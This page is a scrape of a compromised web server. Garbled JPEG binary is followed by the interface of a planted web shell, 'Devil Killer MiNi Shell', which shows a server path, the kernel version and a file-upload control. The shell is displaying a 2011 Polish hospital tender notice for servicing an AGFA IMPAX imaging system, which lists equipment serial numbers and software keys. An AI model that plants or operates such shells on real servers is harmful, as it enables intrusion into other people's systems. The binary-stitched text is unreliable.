JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/128991-N-2011.html

<p class="kh_header"><b>Toruń: Świadczenie usług serwisowych oprogramowania systemu AGFA IMPAX 6.x.
oraz świadczenie usług serwisowych sprzętu komputerowego, na którym funkcjonuje oprogramowanie AGFA IMPAX 6.x.</b><br>
<b>Numer ogłoszenia: 128991 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług serwisowych oprogramowania systemu AGFA IMPAX 6.x.
oraz świadczenie usług serwisowych sprzętu komputerowego, na którym funkcjonuje oprogramowanie AGFA IMPAX 6.x..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:<br>
Zadanie Nr 1 - świadczenie usług serwisowych oprogramowania systemu AGFA IMPAX 6.x.<br>
1.1. Świadczenie usług serwisowych oprogramowania systemu AGFA IMPAX 6.x. - dotyczy:<br>
- MEDICAL PRO SOFTWARE,<br>
- VMWARE VIRTUAL CENTER nr seryjny 7208H-00R0E-H9FEJ-234NC,<br>           
- VMWARE ESX ENTERPRISE   nr seryjny 6252E-Z8NDP-Y79LM-2DWWA,<br>    
- VMWARE ESX ENTERPRISE   nr seryjny 6A50X-Z80F2-YG5LD-208J2,<br> 
- VMWARE ESX ENTERPRISE   nr seryjny 6052R-ZA14K-YGWH-20WPH,<br>
- VMWARE ESX ENTERPRISE   nr seryjny 6002W-Z84FQ-Y79CM-2FWE9,<br> 
- OPROGRAMOWANIA DO ARCHIWIZACJI QSTAR  nr seryjny 469001,<br>    
- OPROGRAMOWANIA AGFA IMPAX 6.x,  OPROGRAMOWANIA CD POWER PACS,<br> 
- AGFA ORTHOPEADIC TOOLS,<br>
- ORTHOGON 1.0 + USB DONGLE.<br>                
1.2. Obsługa serwisowa obejmuje:<br>
1.) Wykonywanie planowych konserwacji okresowych zgodnie z zaleceniami producenta min. 2 przeglądy okresowe w trakcie trwania umowy.<br>
2.) Regularna, prewencyjna kontrola poprawności działania Systemu poprzez kontrolę  zdarzeń  (logów),  mająca na celu zapobieganie powstawaniu awarii Systemu. Wykonawca  zobowiązany będzie do prowadzenia prac kontrolnych w cyklu tygodniowym. Wykonawca zobowiązany będzie do przesłania wyniku raportu do Użytkownika.<br>
3.) Wykonawca zobowiązany będzie do usuwania awarii systemu bez dodatkowego  obciążenia  Zamawiającego kosztem robocizny, dojazdu.<br>  
4.) Wykonawca zobowiązany będzie do świadczenia Usług Serwisowych dla Systemu od  poniedziałku  do piątku w godz. 8:00 do 16:00 z wyłączeniem świąt oraz dni ustawowo wolnych od pracy.<br> 
5.) Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie interwencji naprawy  zdalnej  w ciągu 1 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br>
6.)  Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie naprawy na miejscu u Zamawiającego w ciągu 24 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br> 
 7.) Wykonawca zobowiązany będzie do prowadzenia dyżurów 24/7 dla wsparcia zdalnego oprogramowania. <br>
 8.)  Wykonawca zapewni bieżący upgrade do nowej wersji oprogramowania.<br>
1.3.   Każdorazowo po wykonaniu przeglądu okresowego Wykonawca wyda stosowny certyfikat poświadczający przeprowadzenie prac konserwacyjnych przez autoryzowany serwis. <br> 
1.4. Wykonawca zobowiązany będzie do prowadzenia Konsultacji Technicznych dla wskazanych Użytkowników w wymiarze do 16 godzin rocznie w dowolnie wybranych przez Zamawiającego cyklach min. 1 godzinnych. Termin Konsultacji Technicznej zostanie ustalony między Wykonawcą a  Zamawiającym z 3 dniowym wyprzedzeniem. Fakt odbycia Konsultacji Technicznych zostanie  potwierdzony w formie pisemnej na podstawie wypełnionego każdorazowo formularza dostarczanego przez Zamawiającego.<br>

Zadanie Nr 2 - świadczenie usług serwisowych sprzętu komputerowego, na którym funkcjonuje oprogramowanie AGFA IMPAX 6.x.<br>

2.1. Świadczenie usług serwisowych sprzętu komputerowego, na którym funkcjonuje oprogramowanie AGFA IMPAX 6.x. - dotyczy:<br>
- STACJI ROBOCZEJ HP XW6600 nr seryjny CZC9032WK7, <br>
- MONITORA DIAGNOSTYCZNEGO BARCO NIO 2MP 21 cali nr seryjny 1890156380, <br>
- MONITORA DIAGNOSTYCZNEGO BARCO NIO 2MP 21 cali nr seryjny 1890156382,<br> 
- MONITORA OPISOWEGO HP LCD 19cali nr seryjny CNK8431W4P, <br>
- CZUJNIKA KALIBRACYJNEGO BARCO nr seryjny 090225145,<br> 
- ZASILACZA AWARYJNEGO UPS 750VA PW 5115 nr seryjny GB361A0962, <br>
- BIBLIOTEKI TAŚMOWEJ HP MSL 6030 nr seryjny 2U29040009, <br>
- INFRASTRUKTURY (OBUDOWY) SERWERÓW KASETOWYCH (BLADE) HP C3000 nr seryjny CZC9030B5V,<br>
- SERWERA HP BLADE BL465C nr seryjny CZJ90303H9,  <br>
- SERWERA HP BLADE BL465C nr seryjny CZJ90303HA, <br>
- SERWERA HP BLADE BL465C nr seryjny CZJ90303H2,<br>       
- SERWERA HP BLADE BL465C nr seryjny CZJ90303GB,<br>   
- ZASILACZA AWARYJNEGO HP R5500 XR - INTL UPS  nr seryjny MX18410847,<br>  
- ZASILACZA AWARYJNEGO HP R5500 XR - ERM UPS  nr seryjny MX18361952, <br>
- ZASILACZA AWARYJNEGO HP R5500 XR - INTL UPS  nr seryjny MX18420289, <br>   
- ZASILACZA AWARYJNEGO HP R5500 XR - ERM UPS  nr seryjny MX18361953,<br>  
- ROUTERA CISCO 871  nr seryjny FCZ124391Z9, <br>                                       
- SWITCHA LAN CISCO  nr seryjny F0C1222T1MG,<br>                         
- SWITCHA LAN CISCO  nr seryjny F0C1222T1GJ, <br>                                
- SWITCHA SAN BROCADE nr seryjny CN88427042, <br>                             
- SWITCHA SAN BROCADE nr seryjny CN8848703P,<br>        
- MACIERZY DYSKOWEJ ZEWNĘTRZNEJ HP MSA2000 nr seryjny 3CL843C127, <br>  
- MACIERZY DYSKOWEJ ZEWNĘTRZNEJ HP MSA2000 nr seryjny 3CL849C599,<br>  
- DYSKU SAS 15K 450GB (12 SZT.),<br>                                  
- DYSKU SAS 15K 146GB (12 SZT.),<br>                                                         
- SYSTEMU PRODUKCJI PŁYT Z BADANIAMI DLA PACJENTÓW RIMAGE 2000i nr seryjny 
  10019742,<br>     
- MONITORA LCD DELL 17 cali nr seryjny 8A7-3WGS, <br>   
- KOMPUTERA STERUJĄCEGO DELL PRECISION 690 nr seryjny 75YNH3J,<br>                
- STATYWU FLFS,<br>  
- KRATKI FLFS,<br>                                                            
- WINDY FLFS,<br>                 
- KASETY Z PŁYTĄ OBRAZOWĄ 35x43 CM TYPU MD 4.1. - 3 szt.,<br>         
- SWITCHA TYP 3COM 4200G48Port nr seryjny YFCFA8MFA7200.<br>   
2.2.  Obsługa serwisowa obejmuje:<br>  
1.) Wykonywanie planowych konserwacji okresowych zgodnie z zaleceniami producenta min. 2 przeglądy okresowe w trakcie trwania umowy.<br> 
2.) Fizyczne czyszczenie sprzętu informatycznego raz na 6 miesięcy.<br> 
3.) Wykonawca zobowiązany będzie do  usuwania awarii systemu bez dodatkowego  obciążenia  Zamawiającego kosztem robocizny, dojazdu, części zamiennych w szczególności podzespołów komputerowych w przypadku ich wymiany.<br>  
4.) Wykonawca zobowiązany będzie do świadczenia Usług Serwisowych dla sprzętu komputerowego od  poniedziałku  do piątku w godz. 8:00 do 16:00 z wyłączeniem świąt oraz dni ustawowo wolnych od pracy.<br>  
5.) Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie interwencji naprawy zdalnej w ciągu 1 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br> 
6.)  Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie naprawy na miejscu u Zamawiającego w ciągu 24 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br> 
7.)Wykonawca zobowiązany będzie do bezpłatnego podłączenia kolejnych urządzeń diagnostycznych do Systemu w okresie obowiązywania umowy.<br>     
2.3.   Po każdym przeglądzie Wykonawca przekaże Zamawiającemu świadectwo sprawności sprzętu komputerowego.<br>  
2.4. Po każdej wizycie serwisowej Wykonawca przekaże Zamawiającemu raport serwisowy.<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ oświadczenie, że Wykonawca posiada autoryzację producenta na świadczenie usług serwisowych systemu AGFA - dotyczy tylko Zadania Nr 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych min. 2 usług serwisowych oprogramowania medycznego dla Zadania Nr 1, a dla Zadania Nr 2 min. 2 usług serwisowych sprzętu komputerowego o wartości  minimalnej dla poszczególnych zadań:<br>
- dla zadania nr 1 -  41.160,00 zł<br>
- dla zadania nr 2 -    8.232,00 zł<br>
brutto każda usługa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te usługi zostały wykonane należycie;<br>

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku dotyczącego potencjału technicznego Zamawiający nie określa szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ oświadczenie, że osoba/osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia do realizowania usługi będącej przedmiotem zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty: 
- dla zadania nr 1 - 30.870,00 zł<br>
- dla zadania nr 2 -  6.174,00 zł <br>
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
	
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie tych zadań.<br>
    
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>

Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br><br>
*Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa 
w art. 24 ust. 1.
*Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie 
i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny podane w o ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych - pokój nr 2
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa  53/59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - świadczenie usług serwisowych oprogramowania systemu AGFA IMPAX 6.x..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:<br>
1.1. Świadczenie usług serwisowych oprogramowania systemu AGFA IMPAX 6.x. - dotyczy:<br>
- MEDICAL PRO SOFTWARE,<br>
- VMWARE VIRTUAL CENTER nr seryjny 7208H-00R0E-H9FEJ-234NC,<br>           
- VMWARE ESX ENTERPRISE   nr seryjny 6252E-Z8NDP-Y79LM-2DWWA,<br>    
- VMWARE ESX ENTERPRISE   nr seryjny 6A50X-Z80F2-YG5LD-208J2,<br> 
- VMWARE ESX ENTERPRISE   nr seryjny 6052R-ZA14K-YGWH-20WPH,<br>
- VMWARE ESX ENTERPRISE   nr seryjny 6002W-Z84FQ-Y79CM-2FWE9,<br> 
- OPROGRAMOWANIA DO ARCHIWIZACJI QSTAR  nr seryjny 469001,<br>    
- OPROGRAMOWANIA AGFA IMPAX 6.x,  OPROGRAMOWANIA CD POWER PACS,<br> 
- AGFA ORTHOPEADIC TOOLS,<br>
- ORTHOGON 1.0 + USB DONGLE.<br>                
1.2. Obsługa serwisowa obejmuje:<br>
1.) Wykonywanie planowych konserwacji okresowych zgodnie z zaleceniami producenta min. 2 przeglądy okresowe w trakcie trwania umowy.<br>
2.) Regularna, prewencyjna kontrola poprawności działania Systemu poprzez kontrolę  zdarzeń  (logów),  mająca na celu zapobieganie powstawaniu awarii Systemu. Wykonawca  zobowiązany będzie do prowadzenia prac kontrolnych w cyklu tygodniowym. Wykonawca zobowiązany będzie do przesłania wyniku raportu do Użytkownika.<br>
3.) Wykonawca zobowiązany będzie do usuwania awarii systemu bez dodatkowego  obciążenia  Zamawiającego kosztem robocizny, dojazdu.<br>  
4.) Wykonawca zobowiązany będzie do świadczenia Usług Serwisowych dla Systemu od  poniedziałku  do piątku w godz. 8:00 do 16:00 z wyłączeniem świąt oraz dni ustawowo wolnych od pracy.<br> 
5.) Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie interwencji naprawy  zdalnej  w ciągu 1 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br>
6.)  Zapewnienie reakcji ze strony serwisu w rozumieniu jako podjęcie naprawy na miejscu u Zamawiającego w ciągu 24 godziny od chwili pisemnego lub telefonicznego zgłoszenia usterki przez Zamawiającego.<br> 
